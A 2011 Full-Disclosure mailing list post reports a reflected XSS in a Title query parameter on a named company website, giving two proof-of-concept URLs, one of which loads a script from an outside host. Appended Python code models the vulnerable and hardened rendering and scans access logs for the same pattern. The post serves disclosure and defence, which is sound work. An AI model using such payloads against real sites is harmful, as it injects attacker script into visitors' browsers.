Message-ID: <CACjdTt_+W2=j1TF_5nZm8NUdXctHTZVAmHmLqcHxX_Y+sZeMDQ@mail.gmail.com>
Date: Mon, 5 Sep 2011 02:00:10 +0530
From: Madhur Ahuja <ahuja.madhur@...il.com>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: XSS Vulnerability in www.emerson.com
One of the pages on the Emerson site is rendering the query string parameter
without any inspection. This makes it possible to inject malicious content,
as shown below:
http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cimg%20src='http://www.emerson.com/SiteCollectionImages/local/united-states/english/fastpath/INBDB%2020110225.jpg'%3E
http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cscript%20src=%22http://madhur.github.com/files/js/site.js%22%20type=%22text/javascript%22%3E
--
Madhur
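The report above describes a classic reflected XSS: a query-string value is echoed into the HTML response without output encoding, so the browser parses it as markup. The following is an added example, not code from the original post or from emerson.com. It models the reported behaviour in Python beside the hardened form, and adds a defender-side check that flags the same pattern in web-server access logs. The page in the report is an ASP.NET/SharePoint `.aspx` page whose real markup is not on this page, so `PAGE_TEMPLATE` is a constructed stand-in, the access-log lines are constructed, and the helper names (`title_param`, `render_vulnerable`, `render_hardened`, `injects_markup`, `markup_params`, `scan_log`) are hypothetical. The two URLs quoted in the report are reused as sample input.

```python
"""
Reflected XSS on a query-string parameter: the reported behaviour modelled
beside its fix, plus a log check for the same pattern.

Added example, not code from the original post or from emerson.com. The
real page is an ASP.NET/SharePoint .aspx page; this model only reproduces
what the report describes (the Title parameter echoed into HTML verbatim)
and the standard fix (HTML-encoding the value for the context it lands in).
PAGE_TEMPLATE and ACCESS_LOG are constructed for the example.
"""
import re
from html import escape
from urllib.parse import parse_qs, urlsplit

# The two URLs quoted in the report, used as sample input.
REPORTED_URLS = [
    "http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cimg%20src="
    "'http://www.emerson.com/SiteCollectionImages/local/united-states/english/fastpath/INBDB%2020110225.jpg'%3E",
    "http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cscript%20src="
    "%22http://madhur.github.com/files/js/site.js%22%20type=%22text/javascript%22%3E",
]

# Constructed stand-in for the page body; the real markup is not on the page.
PAGE_TEMPLATE = "<html><body><h1>{title}</h1><p>Email this page</p></body></html>"
TEMPLATE_TAG_COUNT = PAGE_TEMPLATE.count("<")


def query_params(url_or_target):
    """URL-decode the query string of a full URL or request target into {name: [values]}."""
    return parse_qs(urlsplit(url_or_target).query, keep_blank_values=True)


def title_param(url):
    """The decoded Title parameter, exactly as the server would receive it."""
    return query_params(url).get("Title", [""])[0]


def render_vulnerable(title):
    """Model of the reported behaviour: the decoded parameter is inserted verbatim,
    so any '<' or '>' in it becomes markup in the response."""
    return PAGE_TEMPLATE.format(title=title)


def render_hardened(title):
    """Fix: encode for an HTML element-content context before insertion.
    In ASP.NET this is HttpUtility.HtmlEncode; html.escape does the same here."""
    return PAGE_TEMPLATE.format(title=escape(title, quote=True))


def injects_markup(rendered):
    """True if the response carries more tag openers than the template itself,
    i.e. the parameter contributed markup rather than text."""
    return rendered.count("<") > TEMPLATE_TAG_COUNT


# --- Detection side: find the same pattern in web-server access logs ----------

# Constructed Common Log Format lines; the second has the shape of the reported URL,
# the third shows a benign special character that must not be flagged.
ACCESS_LOG = [
    '10.0.0.5 - - [05/Sep/2011:01:59:01 +0530] "GET /_layouts/MCS/Email.aspx?Title=Email%20this%20page HTTP/1.1" 200 512',
    '10.0.0.5 - - [05/Sep/2011:01:59:44 +0530] "GET /_layouts/MCS/Email.aspx?Title=%3Cscript%20src=%22http://example.invalid/x.js%22%3E HTTP/1.1" 200 640',
    '10.0.0.7 - - [05/Sep/2011:02:00:02 +0530] "GET /_layouts/MCS/Email.aspx?Title=Pricing%20%26%20Support HTTP/1.1" 200 520',
]
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')


def markup_params(request_target):
    """Names of query parameters whose decoded value contains an angle bracket."""
    params = query_params(request_target)
    return sorted(n for n, vals in params.items() if any(c in v for v in vals for c in "<>"))


def scan_log(lines):
    """Return (line_number, path, [param names]) for requests whose query string
    carries markup characters, the input shape that triggers the reported bug."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        target = m.group("target")
        flagged = markup_params(target)
        if flagged:
            hits.append((lineno, urlsplit(target).path, flagged))
    return hits


if __name__ == "__main__":
    for url in REPORTED_URLS:
        t = title_param(url)
        print("vulnerable output injects markup:", injects_markup(render_vulnerable(t)))
        print("hardened output injects markup:  ", injects_markup(render_hardened(t)))
    print(scan_log(ACCESS_LOG))
```

The fix shown encodes for element content only; a value placed inside an attribute, a `<script>` block or a URL needs the encoding for that context instead, and the log check is a coarse triage signal (it flags the input shape, not whether the page actually reflected it), so confirm a hit against the response body or the page's own source.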
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/